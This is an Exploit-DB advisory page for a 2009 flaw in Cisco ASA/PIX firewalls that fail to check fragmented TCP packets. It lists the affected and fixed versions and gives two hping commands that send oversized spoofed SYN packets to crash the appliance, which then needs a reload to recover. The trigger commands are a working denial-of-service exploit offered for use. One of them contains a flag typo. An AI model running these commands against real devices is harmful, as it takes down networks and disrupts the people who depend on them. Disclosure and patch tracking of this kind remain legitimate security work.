Cisco ASA/PIX Appliances Fail to Properly Check Fragmented TCP Packets



EDB-ID: 8393 CVE: N/AOSVDB-ID: N/A
Author: Daniel ClemensPublished: 2009-04-10Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
The vulnerability affects the following Cisco ASA/PIX versions:
Release     Fixed in:
--------     ---------
6.3        Not affected
7.0        7.0(8.6)
7.1        7.1(2.81)
7.2        7.2(4.30)
8.0        8.0(4.28)
8.1        8.1(2.19)
8.2        8.2(0.230)
-----------------------------
Triggering the vuln
------------------------------
/*Utilize  1550 blocks on an ASA to trigger a crash...*/
hping --fast -p 22 -w 1518 -S -d 1480 -a 10.22.1.1 10.22.1.2
/* Trigger the vuln a bit faster */
hping --fast -p 22 -w 1518 -S -d 26201 .a 10.22.1.1 10.22.1.2
Reloading the device is the only way to recover from the denial of service.
| Daniel Uriah Clemens
"Moments of sorrow are moments of sobriety"
# milw0rm.com [2009-04-10]






Comments

No comments so far